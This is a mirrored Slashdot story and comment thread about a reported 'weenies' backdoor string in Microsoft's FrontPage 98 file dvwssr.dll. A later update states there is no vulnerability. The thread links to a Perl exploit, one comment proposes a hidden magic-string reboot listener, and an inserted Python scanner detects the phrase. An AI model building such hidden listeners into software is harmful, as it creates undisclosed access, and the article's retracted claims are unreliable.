Slashdot Mirror


Backdoor In Microsoft Web Software?

There's a backdoor in Microsoft Webserver software. The Wall Street Journal article isn't very technical, so we don't know yet exactly which software is affected: IIS, FrontPage, or both. It apparently doesn't affect Windows 2000 or FrontPage 2000. The workaround Microsoft "urges" is to delete dvwssr.dll. And just to make your Friday a little more surreal, the secret backdoor password apparently has something to do with Netscape engineers being "weenies."

Update: 04/14 09:02 by J : It's been a busy day for some programmers at Microsoft and elsewhere. The word as of 3:30 EDT, according to Russ Cooper, is that "there is NO VULNERABILITY IN DVWSSR.DLL. Yup, that's right, different again from what I said earlier, and even more different than what I said yesterday to WSJ."

Here are the basic details from the article (expensive reg. req.), because I can't find this story anywhere else. Strange that the WSJ should have the scoop on a security issue.

Microsoft Acknowledges Its Engineers Placed Security Flaw in Some Software
By TED BRIDIS
Staff Reporter of THE WALL STREET JOURNAL

Microsoft Corp. acknowledged Thursday that its engineers included in some of its Internet software a secret password -- a phrase deriding their rivals at Netscape as "weenies" -- that could be used to gain illicit access to hundreds of thousands of Internet sites world-wide. [...]

The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site. Microsoft urged customers to delete the computer file -- called "dvwssr.dll" -- containing the offending code. The file is installed on the company's Internet-server software with FrontPage 98 extensions.

While there are no reports that the alleged security flaw has been exploited, the affected software is believed to be used by many Web sites. By using the so-called back door, a hacker may be able to gain access to key Web-site management files [...]

Russ Cooper, who runs the popular NT Bugtraq discussion forum on the Internet, estimated that the problem threatened "almost every Web-hosting provider." [...]

And, Black Parrot passed along this link to a CBS Marketwatch story, which is free but short on detail.

445 comments

  1. SANITY CHECK - Is this only a backdoor DLL?? by Anonymous Coward · · Score: 1

    In that one can remove this DLL with apparent impunity, is the sole purpose for its creation and use to function as a backdoor? This seems much more deliberate and inexcusable than a few people adding a backdoor on top of existing code on the sly as "claimed" by the company.

  2. Microsoft Remedies by Anonymous Coward · · Score: 1

    1) Don't use it.

    2) If you admin an exchange server, open up POP3 and let the user base know.

    3) Massive tax incentives for industry that uses non-MS software. Similar to what the government already does for minority (women, non-white) business owners.

    4) All state and federal government entities will be mandated to reduce dependency on MSHAFT products or services at a rate of 10% per year. Those failing to meet the goal will face a funding penalty of 10% per year, until compliance is met. Penalty funds will be redistributed to those entities that exceeded the goal.

    Thank You.

  3. Microsoft Bugs by Anonymous Coward · · Score: 1

    No, actually MS has a great number of people in their QA department, but like all shrinkwrap software vendors, Quality Assurance is there to take the heat instead of development when bugs are found in feature-bloated, rushed-to-market software.

    "...Why didn't QA find this bug!..."

    My favorite quote from the management goons at a certain, unnamed uppity antivirus vendor...

  4. Re:What took so long? by Anonymous Coward · · Score: 1

    Actually, having worked there as a developer, there is a lot of QA at Microsoft. The number of QA staff approximately equals the number of developers. The real reason MS products are so buggy is that their development processes are terrible. They don't do any design or modelling before they start writing code. Once they have an idea of what they're going to do, they just start coding. Then they refactor, rewrite, fix, debug, kludge, hack, etc. that code until the release date.

    If you don't make your software changeable right from the start, you're going to run into all kinds of problems when the specs change, and that's essentially their problem. They have some pretty talented people there, but their short-sightedness became so frustrating that I couldn't stand it anymore. I've worked at other companies where the QA team comprises no more than 20% of the engineering staff, as opposed to like 50% at MS, yet we produced better, higher quality, more reliable software than MS does.

  5. Re:spectacular by Anonymous Coward · · Score: 1

    If they encrypted it they couldn't export it ;-)

  6. Re:What took so long? by Anonymous Coward · · Score: 1

    You'd expect, though, that a large group of overpaid geeks could at least build a less buggy OS than a group of individuals working for free in their spare time to build an OS which can work just as well...

  7. Another DLL found by Anonymous Coward · · Score: 1

    Sorry, I don't use a Slashdot nick, and it's taking too long to get my password, so I'm posting this anon. Hunting around for the Netscape thing, I found another dll with the "Netscape engineers are weenies!" string backwards: MDT2LV.DLL. Just in case anyone is interested. -J.Bednar

  8. Exploit by Anonymous Coward · · Score: 1

    Here's an advisory with a perl exploit from rain forest puppy: http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=2

  9. Re:How is a string backwards a backdoor? by whoop · · Score: 1

    Well, I was over at SecurityFocus and saw a listing in the headlines, "MS admits planting secret password." It's a link to the ZDNet article. Maybe the MS guy slipped and what he really meant was, "it's just a silly string some programmer put in. It does nothing bad to your system. Well, until someone makes that memo I sent out yesterday public."

  10. Re:Ye gods. by whoop · · Score: 1

    There's nothing up on microsoft.com about it yet either, which also strikes me as strange.

    Why is this strange? For all major mistakes like this, Microsoft has a Standard Operating Procedure. First, it does not exist. This will buy about 16 hours as 99% of reporters just accept what comes out the mouth of those they interview. Second, blame this evil rumor on those damned Linux hippies. Those kids are always up to no good. Source code only leads to trouble. Third, someone will eventually double-check the bug, so come out with a minor fix. "Well, it's installed that way by default, but you should really check the permissions on this or that yourself." Finally, if people still don't leave you alone, put a nice innocent blurb in the bug database, "Delete the file. Disabling this security feature could render your entire universe unstable. One person did it in their basement and a wormhole was created sucking him and two pals and a singer driving by the street. Hey, if that's the life you want to lead, it's your decision. Our web server still kicks ass of any other closed source competition. Apache doesn't count because it's run by hippies." Or something like that. ;)

    There's been many a bug discussed over the last few years here on Slashdot. Pretty much every time there's 10-14 days from the time it's mentioned on Bugtraq or other security web site to the time Microsoft admits to it, because they must follow this SOP.

  11. Re:Locked out domain admin by narf · · Score: 1

    Supervisor? This is WinNT! We don't need no "SUPERVISOR Equivlancy".

    Offtopic: God, I love SYSCON. Being able to create users and reset passwords without looking at the screen or keyboard. U Ins luser Enter Enter Gr Ins Acc Enter Esc Esc.

  12. FP98 extensions for UNIX affected? by Vic+Metcalfe · · Score: 1
    I don't read ntbugtraq, but I searched the archives for 'weenies' and didn't come up with anything. I wonder if the FP98 extensions for UNIX are affected.

    strings shtml.exe | grep -i ween

    didn't show any matches. Of course we'd expect them to hash the password anyway.

    1. Re:FP98 extensions for UNIX affected? by Spirilis · · Score: 1

      (redundant but anyway...) One of the top comment posters mentioned, the password is stored (in Windows) in reverse, so check for neew instead of ween.

      --
      the real at&t mix
    2. Re:FP98 extensions for UNIX affected? by LordDracula · · Score: 1
      If you notice the post above which includes the string, you'll see that the string is backwards.

      This explains why your search didn't turn up anything. Try neew...


      Your Friend,

      --
      Your Friend,
      D
    3. Re:FP98 extensions for UNIX affected? by ebcdic · · Score: 2

      Assuming the link posted in another message is genuine, the string you need to look for is !seineew era sreenigne epacsteN
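
The search discussed in this thread (a plain `strings | grep ween` misses the phrase because it is stored reversed), as an added example that is not part of any comment: a Python scanner that checks files for the phrase forward and reversed, in ASCII and, going beyond the thread, in UTF-16LE. The function names and the `.dll`/`.exe` extension filter are assumptions of this example.

```python
"""Added example: find a marker phrase in binaries, forward or reversed."""
import os
import sys

# Phrase quoted in the thread; the comments say the file holds it reversed.
PHRASE = "Netscape engineers are weenies!"


def build_patterns(phrase):
    """Return {label: bytes} for each way the phrase may be stored."""
    patterns = {}
    for order, text in (("forward", phrase), ("reversed", phrase[::-1])):
        patterns[order + "/ascii"] = text.encode("ascii")
        # Assumption of this example: Windows binaries may also hold the
        # phrase as a wide (UTF-16LE) string, which a byte-wise grep misses.
        patterns[order + "/utf-16le"] = text.encode("utf-16-le")
    return patterns


def scan_bytes(data, patterns, ignore_case=True):
    """Return a sorted list of (offset, label) for every match in data."""
    haystack = data.lower() if ignore_case else data
    hits = []
    for label, needle in patterns.items():
        if ignore_case:
            needle = needle.lower()  # bytes.lower() only touches ASCII letters
        start = haystack.find(needle)
        while start != -1:
            hits.append((start, label))
            start = haystack.find(needle, start + 1)
    return sorted(hits)


def scan_tree(root, patterns, extensions=(".dll", ".exe")):
    """Walk root and return {path: hits} for files that contain a pattern."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    hits = scan_bytes(fh.read(), patterns)
            except OSError:
                continue  # unreadable or locked file: skip it
            if hits:
                results[path] = hits
    return results


if __name__ == "__main__":
    pats = build_patterns(PHRASE)
    if len(sys.argv) > 1:
        # Inventory mode: list every matching binary under the given directory.
        for path, hits in sorted(scan_tree(sys.argv[1], pats).items()):
            for offset, label in hits:
                print(f"{path}: offset {offset:#x} ({label})")
    else:
        # Constructed sample bytes (not taken from any real DLL).
        sample = b"\x00\x01MZ" + PHRASE[::-1].encode("ascii") + b"\x00pad"
        print("grep-style 'ween' match:", b"ween" in sample.lower())
        print("scanner hits:", scan_bytes(sample, pats))
```

Run with a directory argument to inventory binaries under it; with no argument it runs on the constructed sample.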

  13. Eating Shrimp and Weenies by dmd · · Score: 1
    Does this mean that Microsoft engineers are ... I'm not even going to think about the sexual connotations put forth by this bit of doggerel:
    From http://www.microsoft.com/Museum/exhibits/culture/GeekSpeak.ASP
    The alpha geek, no bandwidth left,
    Not meaning to be rude
    Went OOF, a CLM,
    And ate his own dog food.

    A random act? Let's drill down now.
    The lines let's look between.
    He's Crisp, Okay, he's Plug and Play,
    He's eating shrimp and weenies



    --
  14. Re:Hey, Does this mean I can delete all my .dlls? by Suydam · · Score: 1

    Yeah, you can delete them all, provided you have a Linux install disk handy.

    --


    Werd.
  15. Re:Windows 98 by Suydam · · Score: 1

    no no no...you've got it all wrong. If you install Windows 98 backwards it says "Bill is Dead....Bill is Dead".

    --


    Werd.
  16. Re:Affects "almost every Web-hosting provider." by Nail · · Score: 1

    Oh, I didn't realize I had no choice.

    --
    ...yellow number five, yellow number five, yellow number five...
  17. Firing offense? by jafac · · Score: 1

    If Microsoft was truly dedicated to providing a superior and secure product to their customers, as all their press releases seem to claim, then they owe it not only to their customers, but especially to their customers' customers, to not only FIRE these naughty "security-through-obscurity scofflaws", but to bring legal action against them as well. Hell, knowing how many government contracts MS has, I would even venture to say that these hoodlums might be up for TREASON. Shine up those firing-squad rifles boys!

    I wish I had a nickel for every time someone said "Information wants to be free".

    --

    These are my friends, See how they glisten. See this one shine, how he smiles in the light.
    1. Re:Firing offense? by jafac · · Score: 1

      oh yeah, and I also believe their MANAGERS should be held responsible too.

      I wish I had a nickel for every time someone said "Information wants to be free".

      --

      These are my friends, See how they glisten. See this one shine, how he smiles in the light.
  18. Re:IE 5.0 _does_ have a real easter egg! by tzanger · · Score: 1

    Works with standard English IE5 install. cute easter egg. At least it's not a flight sim. :-)

  19. Lawsuits by kidlinux · · Score: 1

    Not that they have a monopoly on web servers, as apache provides ample competition, but doing what they did in their position is just unreal. Why do people still buy Microsoft products? Who knows how much more of these kind of backdoors lie in other M$ products.

    This isn't just an issue of an employee who should be fired. The fact that this made it all the way through Microsoft Quality Control (or whatever else they do to ensure product integrity, if there is such a thing over there), means that they did not make reasonable efforts to ensure the safety of those using their product.

    They should be told where they can put those end user license agreements. I don't care what anyone says, they won't hold up in court for a second under these circumstances.

    It seems to me like this would be an opening for massive legal liability attacks on Microsoft. They should be taken to court just for punitive damages. This would be something for the DOJ to think about.

    --
    -kidlinux.
  20. Or even treasonous... by Squeeze+Truck · · Score: 1

    Honestly, I think intentionally compromising 21% (hell, they'd like it to have been 100%!!) of internet infrastructure goes a little beyond "criminal".

    --

    "Reactionaries must be deprived of the right to voice their opinions; only the people have that right." - Mao

  21. Even then, you still can't be sure, now can you? by Svartalf · · Score: 1

    Just because someone tries to follow the CMM (And there's a lot of companies that think they do) there's still backdoors and easter eggs that get in. Would you know if there was something dangerous like this lurking in your closed source code? No. Thank you, but I'd like to keep my open source as much as possible- I can at least have a trusted party audit the code if I can't audit it myself (which isn't very likely.).

    --
    I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
  22. Re:Grounds for Netscape to sue ? by AnOminous+CowHerd · · Score: 1

    I'd care to comment:

    I think you're part of the problem. Sue away.

  23. Re:Heaven's Gift? (Obvious Troll) by Oloryn · · Score: 1
    But since Microsoft makes COMMERCIAL software, you can run right down to the courthouse and SUE THEIR ASSES OFF!

    I mean, that's what you pay for when you buy commercial software, right?

    Uh, sure, Bubba. And the likelihood of your actually being able to win the suit in a short enough time to keep your business out of bankruptcy (not to mention all the rights you have to give up in order to get licenses) has nothing to do with the soundness of this as a business strategy. Right.

    Personally, I think that anyone who thinks that betting your business on the ability to win a lawsuit against Microsoft is a sound business strategy is a few fries short of the Happy Meal they'll shortly be selling.

  24. Re:Not MS policy by Anthony · · Score: 1

    There are always going to be small things which can get through Like 60,000 bugs

    --
    Slashdot: Where nerds gather to pool their ignorance
  25. Re:Backdoors in "secure software" by bert · · Score: 1

    Documented, normally disabled 'backdoors' for which you need physical access, yes maybe. Undocumented backdoors, opened at the manufacturers' whim, no!

    If this is true, they did /not/ do a good thing here, they did a foolish, security-dumb thing. Lots of people will still have this enabled within a year from now. While this goes for any security breach, this one has been put in deliberately.

    Would such software be in use in my organization, then I would sue the hell out of MS for this.

  26. Re:No, Apache _not_ affected. by djweis · · Score: 1

    That's an apache wrapper to work around frontpage, not the actual source. If you fix the http to ftp, you can read the first file in the directory where it states that you need to first install the frontpage extensions.

  27. Perfect! by theLime · · Score: 1

    Nice. I couldn't have said it better.

  28. Closed Source Breeds This by IRNI · · Score: 1

    I have become so sickened at the companies today that just try to get the quick buck without investing time into a strategy and coming up with their own ideas. They see that they can sell stuff online really quick by using a Microsoft product. They don't think about all the downtime they will have to deal with. They don't think about the instability or insecurity of the platform. They just see dollar signs. Fortunately those who think like this lose their money eventually and their company crumbles.
    Closed source code is why this happened. I would be interested in finding out how this info came to be. I mean it being closed source, they could have kept it secret forever. It obviously was intentional because supervisors have to look the code over. This sort of thing would never come to pass in Apache because we can look at the code before we compile it. I really wonder about society today when they let a company rape them and hold their hand to the next raping.
    *Sigh*

    IRNI

  29. Here are the details by Marc+Slemko · · Score: 1
    UMBRA Advisory

    'nuff said?

  30. Re:OffTopic: Your sig - W3C Validation by pen · · Score: 1
    The UL hack you mentioned will also make Opera recognize the rest of the page as part of the UL (it automatically opens a UL tag for you) and indent it.

    --

  31. Re:Windows 98 by pen · · Score: 1
    Does installing it backwards mean removing it? Because it does work in that case...

    --

  32. Screw being profesional. by juuri · · Score: 1

    That's what is wrong with America these days... people aren't allowed to be people any more. Just because I work for some company, I am now not allowed to make fun of, show animosity towards or make any comments critical of my competition?! WHAT? When did we lose the ability in the US to actually be proud of the company we work for? and for better or worse build them up as though we would a sports team, whilst ripping down our competition.

    Hell the computer industry needs a lot more in fighting and a lot less back patting. It's getting a bit too friendly around here for me.

    ---
    Openstep/NeXTSTEP/Solaris/FreeBSD/Linux/ultrix/OSF /...

    --
    --- I do not moderate.
    1. Re:Screw being profesional. by ahaning · · Score: 1

      Perhaps if it had been "!kcor uoY !tfosoricM oG", there would have been no problem. But remember Papa John's? (They make pizza.) They said they were "Better". And Pizza Hut sued them. They did not say "We are better than Pizza Hut, Dominoes, Donatos, and your local pizza vendor!" They just said "Better Ingredients, Better Pizza" and got whooped in court.

      --
      Withdrawal before climax is very ineffective and those who try this are usually called "parents."
  33. Re:Heres the offending dll by Miskatonic · · Score: 1

    What's amusing here is that my browser, not recognizing the file format, displayed this as a plaintext file. And surely enough, the offending string is CLEARLY visible.

  34. Re:What took so long? by Fozz · · Score: 1

    The point being made here is that Microsoft, because of the closed-source nature of their business, has "deep bugs." These are bugs which never get resolved because despite the size of the company, they just can't afford to get around to them all. The open-source community, on the other hand, has "shallow bugs" and they are typically resolved quickly and completely. When was the last time your Linux machine blue screened? (besides the BSOD screen saver)

  35. Re:Not MS policy by Anarchitect · · Score: 1

    this kind of thing sounds like something they would choose on their own

    But doesn't that say something about the corporate culture at large, in their workplace? I mean - this is one hell of a risk for them to take. If this type of behavior was not encouraged, why would any professional engineer/code monkey take such a chance?

    It seems to me to further illustrate the overall evil that has been bred corporation wide at Microsoft.

    Don't get me wrong, I know a few folk who work there and they are generally good people. But to take risks like this with one's livelihood doesn't make any sense unless it has some sort of tacit approval.

    --
    QA implies some kind of quality to begin with.
  36. Re:Taking a bomb on a plane by DavidTC · · Score: 1
    Actually, that will work, provided you hit them hard enough that either you or your car no longer functions.

    It's smarter just to not get in the car, though. :)

    -David T. C.

    --
    If corporations are people, aren't stockholders guilty of slavery?
  37. Re:What motivates high quality? by DavidTC · · Score: 1

    I think there is a slight difference between them deciding what my life is worth and me deciding.

    -David T. C.

    --
    If corporations are people, aren't stockholders guilty of slavery?
  38. Re:Real Security by DavidTC · · Score: 1
    Sadly, you could drop down from a rope through the air vent in the ceiling. Or was that a movie?

    Did anyone find that most stupidly implausible part of that movie? They should have had 1 inch wide slits, and it should have vented into the antechamber, not an insecure air duct. And, duh security cameras. It would be easy to position them where they couldn't see the screen, but could see anyone using the computer.

    As a matter of fact, they should have just turned the screen away from the door, and had a bulletproof window the woman outside could see through.

    -David T. C.

    --
    If corporations are people, aren't stockholders guilty of slavery?
  39. Re:Heaven's Gift? by DavidTC · · Score: 1
    That's nothing, I've seen a NetBSD box cracked in two seconds. I can make up numbers too, you know.

    Oh, and 99.9999% of the ways to crack a Unix box are the software, quite a bit of which is shared between NetBSD and Linux. That's why you don't get 'security hole in Linux 2.2.5', you get 'security hole in Sendmail 8.8.2'.

    -David T. C.

    --
    If corporations are people, aren't stockholders guilty of slavery?
  40. Re:Heaven's Gift? by DavidTC · · Score: 1
    Bingo, it was the software. BSD just doesn't use pam, that's the only reason BSD would be safe from that.

    And, yes, sometimes they release untested stuff with Mandrake and Red Hat. Which is why if you want security, you go with Debian or even Slackware.

    -David T. C.

    --
    If corporations are people, aren't stockholders guilty of slavery?
  41. Re:Security through marketing by sachmet · · Score: 1

    Well, I would say that's not entirely fully correct.

    When new security holes are found in open-source software, and reported to Bugtraq or similar sources, usually the maintainers get a heads-up before it's made public and they get an opportunity to fix it before the world at large knows how to exploit it.

    Now don't get me wrong, I'm not defending MS. What I am saying is that MS might have been working on a patch that they would release when the time was right... oh, say 2036.

  42. Re:Backdoors in "secure software" by Nickus · · Score: 1

    Why don't you just let the inetd start your ssh
    on a nonstandard port? Or have cron monitor the
    ssh daemon and restart if it fails?

  43. Re:So what does the file do then? by IntlHarvester · · Score: 1

    Now the question is why did they concoct this scheme when they could just have used FTP or SMB management of the FrontPage "web"?

    It just seems that Microsoft has an instinct to do themselves in sometimes ...
    --
    Business. Numbers. Money. People. Computer World.
  44. Re:Backdoors in "secure software" by IntlHarvester · · Score: 1

    Yeah, but car doors are "Security through assuming your neighbors are honest." Nobody really believes that they prevent somebody from smashing their window.

    "And why not let user set his own password for backdoor.dll?" -- As others have said, an unused root login or a known support login is really a front door, not a back door.

    "Neither did the moderators, I guess" -- Yup, it's a strange slashdot where someone pronouncing back doors to be a good thing can get moderated up.


    --
    Business. Numbers. Money. People. Computer World.
  45. Sue fest: billions and billions by peter303 · · Score: 1

    Intentional commercial sabotage is going to make
    the monopoly suit look like small potatoes.
    Especially if it was responsible for some of the
    recent penetrations.
    Here come the lawyers!

  46. Didja notice?? by afc · · Score: 1

    One interesting thing we can see in the discussions here is the conspicuous absence of distinguished M$ Astroturfers, such as Zico, Rombuu and TummyX.
    Maybe, just maybe, this can be recognition of the wrong-doing of their beloved company? Or are they just trying to keep a low profile, so as not to appear as "zealots". C'mon guys, we'd appreciate your thoughts on this subject!

    --
    Information wants to be beer, or something like that.
    1. Re:Didja notice?? by Mike+A. · · Score: 1
      Or more likely they don't know whether this is real or not. You don't think They tell us everything, do you?

      Seriously, it looks like there's enough confusion about the issue for more sensible type people of either side to sit back and say, "Okay, let's see what's really going on before we spout off."

      --
      Do I look like I speak for my employer?
  47. Re:How is a string backwards a backdoor? by Guru+Meditation · · Score: 1

    The funny thing is, that there is still no mention of this on the M$ security site.. None, nothing, nada. If the string would indicate a username/password combination to gain development access to pages hosted on servers with the frontpage extensions, I'd expect a more prompt reaction.
    And even though Russ Cooper (NTBugTraq) is being quoted, and the hole is supposedly discovered by Rain Forest Puppy (RFP), a well known name, the NTBugTraq mailinglist is strangely quiet about it all....
    I find that at least slightly suspicious...

    ----------
    'We have no choice in what we are. Yet what are we,
    but the sum of our choices.' --Rob Grant
    ----------

    --
    'We have no choice in what we are. Yet what are we,
    but the sum of our choices.' --Rob Grant
  48. Re:So what does the file do then? by Guru+Meditation · · Score: 1

    As you can read in the final report from rfp, available here, this .dll is only needed for interaction with Visual InterDev 1.0.

    ----------
    'We have no choice in what we are. Yet what are we,
    but the sum of our choices.' --Rob Grant
    ----------

    --
    'We have no choice in what we are. Yet what are we,
    but the sum of our choices.' --Rob Grant
  49. Re:Grounds for Netscape to sue ? by warmi · · Score: 1

    You have a problem here dude ... Lighten up, read up about sense of humor, God forbid, try to crack a joke from time to time - you will see how easy it is.

  50. Re:As for the password...... by warmi · · Score: 1

    Can't beat? They did and in record time. Starting with version 4 IE was and is way better than anything Netscape people ever produced.

  51. There is more info on www.securityfocus.com by EMR · · Score: 1

    I found more information about the "hole" on securityfocus.com. They have a better description than that provided by the WSJ, and they have a perl script with the exploit. I gotta test some servers for the hole and fix them. When will micro$oft learn?

  52. And here's the exploit by dclydew · · Score: 1

    http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=2

    Grab the perl code at the bottom... and behave yourself!!!

    --
    Get a life, not a lifestyle. - Hikem Bey
  53. Re:A sense of humo(u)r in the industry by stx23 · · Score: 1
    No, this actually happened a while ago (I think it was 1997 or so). I remember that after Netscape put the big Mozilla on top, they attached a sticker that said: Netscape 73%, IE 23% :)
    Photographic evidence here
  54. Re:actually... by griffjon · · Score: 1

    Not everyone remembers newsgroup "encryption" standards. Alas! alack!

    --
    Returned Peace Corps IT Volunteer
  55. Re:actually... by Sloppy · · Score: 1

    Um, thanks for the compliment, but I was really just extending a joke that griffjon had already made. :-)


    ---
    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  56. Re:Another nail in closed source software's coffin by pal · · Score: 1

    first of all, no one would dare call a cryptosystem secure UNLESS it has been through exhaustive public cryptanalysis.

    and secondly, yes, authors can put back doors in their programs in subtle ways. however, unless you agree to write ALL of the software that you use, the absolute BEST solution to this that you can hope for is access to the source code. now, since you're not embarking on the task of writing all the software you use (i think RMS was for a while), that means software for which source is available is your best bet. the more people that have the source, the better.

    - pal

  57. Re:Down right criminal... by pal · · Score: 1

    the AVERAGE web site admin gets $50/hr?

    that can't be true.

    - pal

  58. Re:Now that's professional... by raver3d · · Score: 1

    Regarding MS claim that this vulnerabilty does not affect FP2000 extensions - I'm wondering, why? Did they fix the problem? If so, this means that they found it, but were quiet about its existence!

    Of course, I could also be wrong and maybe this entire DLL and its code became obsolete in FP2000 code base and were simply discarded without inspecting the code.

    -- Kostya

  59. Re:Not MS policy by Atreide · · Score: 1

    >>This wouldn't be in their best interests at all,
    >>especially given the current events.

    well... was it written during "the current events" ? No. Look how Bill Gates show in front of judge Jackson... Proud & defiant... Look their low soft quality. In fact they do not bother with reputation. They control the market (not the home market... the real one : professional market, the real power).

    >> Think about it. Why would Microsoft want this put into their software,
    >> when if it was found out, which would be likely,
    >> would lead to a massive publicity scandal, and possible legal action?

    You think it must be the fact of a programmer because it is too dangerous for the corporation to do it : they sure would get caught. Well you can say the same about the programmer : when the backdoor gets public *he* get caught and the corporation will sue him (whenever he left M$ or not).
    that means your argument against the lone programmer (to defend the corp) stands for defending that programmer too. In other words, your argument cannot be used against M$ or the programmer and it cannot be used in their favor too...

    Also, you mention loyalty. Yes M$ people are probably more loyal to their employer than many employees. More than that. They earn lots of money so why would one risk that?

    My conclusion is we can not for sure say it is the act of a lone programmer. That means a doubt taints the "bright" reputation of M$.
    ;-)

    --
    The world belongs to those who get up early. - I'm far from being the king of Earth then :-(
  60. Re:I know the phrase... by Atreide · · Score: 1

    for what I know global.asa are sort of (perl) modules in which you define special events : start/end application (a set of ASP pages form an application)
    ASA files go with ASP

    ASA files are readable, so I do not think the security hole (if any) goes through them...
    one can find some ASA files in the samples provided with IIS

    --
    The world belongs to those who get up early. - I'm far from being the king of Earth then :-(
  61. Re:Down right criminal... by Bryan+Andersen · · Score: 1

    Oops, grabbed the count from Developers list rather than Servers list, but the total cost is roughly the same...

  62. Broken Glass... by Bryan+Andersen · · Score: 1

    MicroSoft doesn't know about the little wires one embeds in security glass to keep it from falling apart when broken. Instead they ship pre broken plain window pain glass with their windows.

  63. Re:Down right criminal... by Tenareth · · Score: 1

    Because of the nature of one of the sites I am working on we are having 3rd party Security experts verify the security layout. Do you know why?

    If we get hacked, and it is apparent we did not take "reasonable" steps to protect our data, we do not get the option of retaliation. Using MS software, IMNSHO is NOT taking "reasonable" steps to protect your data.


    -- Keith Moore

    --
    This sig is the express property of someone.
  64. Re:But only the wealthy can afford to be richeous. by Tenareth · · Score: 1

    I'll finish taking this thread off topic.

    I'm married, with 3 kids. If my boss tells me to do something wrong (putting a backdoor on what should be a "secure" software package). I will leave, period. My wife might complain, but if the marriage is built on respect, she will understand, and back my decision (I'm assuming a traditional single income family, not falling back on the wife's income). Anyway, we are talking about IT. If it takes you more than an hour to get a decent paying job, you aren't trying very hard.


    -- Keith Moore

    --
    This sig is the express property of someone.
  65. Re:Backdoors in "secure software" by platypus · · Score: 1

    Also, wouldn't that be creating a backdoor?
    Yeah I create similar backdoors quite often, they're even more powerful (sometimes) and you can do a variety of things with them.
    I call them "shell account" ;-).
    The trick here is the simplicity of that "server", it's very likely that it will work even if everything else is f*cked.

    To your other question, reboot was just an example. Depending on your skills this small server naturally could do anything, including launching ICBMs or beating Kasparov in chess.
    Or just restart the crashed webserver etc.

  66. Re:Backdoors in "secure software" by platypus · · Score: 1

    Write a small client, sitting on port 53423, doing nothing else than waiting for someone to send the string "ur0w9eufsdiv94721298rhwADJAPJDNmvnyxc,.vm" to tell it to reboot the server.

  67. Re:I just don't get it! by Black+Parrot · · Score: 1

    > I think the Government should form a task force to discover what M$ uses to brain-wash these poor unfortunates.

    There's a subliminal message in the BSOD. While you sit staring at the screen in shock over all the work you just lost, the message goes straight in.

    You don't remember it afterward because you're too busy trying to make up for the time you lost.


    --

    --
    Sheesh, evil *and* a jerk. -- Jade
  68. Re:Odd? by Black+Parrot · · Score: 1

    > What the heck kind of bugfix is deleting a file in the first place?

    Linux users have long advocated formatting c: to cure BSODs.

    --

    --
    Sheesh, evil *and* a jerk. -- Jade
  69. Re:Back doors are back in vogue by Black+Parrot · · Score: 1

    > "Imagine if it had been Microsoft," Harris said.

    I think my laughter just woke up the neighbors.

    --

    --
    Sheesh, evil *and* a jerk. -- Jade
  70. Re:Down right criminal... by eln · · Score: 1

    He did say pay+overhead, which would include
    things like the admin's share of benefits,
    facilities, etc.

  71. Re:How is a string backwards a backdoor? by Muffhead · · Score: 1

    Same thought occurred to me. Anything close to a mention of this is the cryptic message on Rain Forest Puppy's web page.

  72. Re:No, Apache _not_ affected. by Progman · · Score: 1

    was, I guess: 404 not found

  73. No surprise by Zoltar · · Score: 1

    This is the sort of thing that happens when you have a monopoly. You have no fear about doing this crap, because what happens if you get caught? Nothing. MS will go into full spin/damage control and in a month the whole thing will be forgotten.

    Way to go Microsoft, that's the way a world leader in business should act. sheesh.

  74. Re:Spelling.... by SuperKendall · · Score: 1

    :-)

    I only wish I had thought to say it first!

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  75. Re:ESR is wrong?? by SEWilco · · Score: 1

    So we can be certain that this is a well-designed, carefully debugged and reviewed backdoor. It doesn't seem to have been well-documented outside of Microsoft.

  76. Re:Oh dear.... by SEWilco · · Score: 1

    Excuse me, but how do you know the backdoor is not in Win2000? Or how many there are?

  77. Re:What took so long? by SEWilco · · Score: 1

    Excuse me, but how do you know there are no backdoors in Win2000/IIS2000? We do know that a congressman said that "high level deal-making on access to encrypted data had taken place between the NSA and IBM and Microsoft".

  78. Re:Heaven's Gift? by SEWilco · · Score: 1
    "How do you rationalize the money spent on MS licensing?"

    You already spent it. Are you going to throw good money after bad? Are you going to keep using the road you always used even though you've read the reports about how dangerous the bridge over the river is?

  79. Re:Heaven's Gift? -- Nope by SEWilco · · Score: 1

    Actually this was FUD against closed source. Latest reports suggest that the "weenies" key was actually for obfuscation of a client/server link. With open source the experts who noticed the key would have simply looked at the source to see what the DLL does.

  80. Re:Not MS policy by powerlord · · Score: 1

    New trilogy announced from Robert Ludlum
    (co-written by CmdTaco)

    book 1: The Halloween Documents
    Wherein the evil corporation makes its plan for world domination, by crushing and subverting those that would stand against them.

    book 2: The Mozilla Group
    The story of one corporation's struggle to free itself from the encroaching darkness by freeing that which it holds most dear.

    book 3: October GNOME
    One of a growing number of rogue coding groups strike back against the growing darkness.

    book 4: The Easter Revelation
    Where the evil darkness shoots itself in the foot.

    --------------------------------
    (Trilogies always run over :)

    Why is it that so much of what goes on here seems like a great basis for a story? (right down to the title)

    :)

    --
    This space for rent. All reasonable inquiries will be entertained at proprietors discretion.
  81. It's funny, laugh. by freakho · · Score: 1
    Let me be the first to point out that this is severely miscategorized.

    I'll apologize in advance to all those forced to run MS servers.. but what do I care, I'm on vacation.

  82. Too bad they can probably find him/her by BeanThere · · Score: 1


    MS presumably uses some sort of check-in/check-out source code control system, so as long as they've kept backups of the source database it should be quite easy for them to locate the rogue programmer. Whether that programmer was anti-MS or not, I suspect that either way he/she'll be looking for another job real soon.

  83. Re:Ye gods. by TomDLux · · Score: 1
    > That Microsoft's developers could be so recklessly dumb as to add a backdoor that
    > will surely be discovered eventually (unencoded plaintext in a DLL, FFS!!),
    > thus playing right into the hands of the open-source-is-good-for-security
    > argument, and no-one at MS noticed it... the mind boggles.

    Didn't you know? It was Linux dweebers planted at Microsoft under special assignment from Linus Himself.

    We don't have an organization, only an assortment of people who have proven themselves knowledgeable, and a vast cadre of dedicated dweebs who actually check up on things people present as facts. As a result, we can't be infiltrated. But they can ...

  84. Source Code Review? Hello?? by phee · · Score: 1

